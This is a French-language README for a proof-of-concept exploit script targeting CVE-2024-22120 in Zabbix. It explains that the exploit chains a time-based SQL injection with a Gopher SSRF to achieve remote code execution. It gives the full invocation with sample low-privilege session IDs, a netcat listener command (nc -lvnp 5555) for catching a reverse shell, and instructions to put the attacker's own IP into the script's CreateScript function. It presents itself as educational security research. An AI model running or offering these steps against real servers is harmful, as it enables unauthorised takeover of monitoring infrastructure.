
Preuve de concept d'exploit pour CVE-2024-22120 qui exploite une injection SQL temporelle et une SSRF basée sur Gopher pour réaliser une exécution de code à distance sur des serveurs Zabbix vulnérables à des fins de recherche en sécurité éducative.
python exploit.py --ip <Zabbix_IP> --sid <LowPrivileged_SID> --hostid <HostID> --phpsessid <PHPSESSID> --false_time <FalseTime> --true_time <TrueTime>
Vous avez identifié un serveur Zabbix fonctionnant sur l'IP 192.168.1.100 et vous avez accès à un utilisateur à faibles privilèges avec les détails suivants :
sid) : d82bf6715e1d3c1f25hostid) : 10107phpsessid) : a4g7f48d9j3r7h8s9gVous souhaitez exploiter la vulnérabilité RCE à l'aide de ce script.
python exploit.py --ip 192.168.1.100 --sid d82bf6715e1d3c1f25 --hostid 10107 --phpsessid a4g7f48d9j3r7h8s9g --false_time 1 --true_time 3
--ip 192.168.1.100 : L'adresse IP du serveur Zabbix.--sid d82bf6715e1d3c1f25 : L'ID de session d'un utilisateur à faibles privilèges.--hostid 10107 : L'ID d'un hôte auquel l'utilisateur à faibles privilèges peut accéder.--phpsessid a4g7f48d9j3r7h8s9g : L'ID de session PHP utilisé pour authentifier les requêtes.--false_time 1 : Temps en secondes à attendre en cas de supposition erronée lors de l'injection SQL (par défaut 1 seconde).--true_time 3 : Temps en secondes à attendre en cas de supposition correcte lors de l'injection SQL (par défaut 3 secondes).10.0.46.27:5555 dans le script).Assurez-vous que votre machine écoute sur le port spécifié (5555 dans le script) pour capturer le shell inverse. Vous pouvez utiliser netcat pour cela :
nc -lvnp 5555
Remplacez l'IP 10.0.46.27 et le port 5555 dans la fonction CreateScript par votre propre IP et le port souhaité pour recevoir le shell inverse.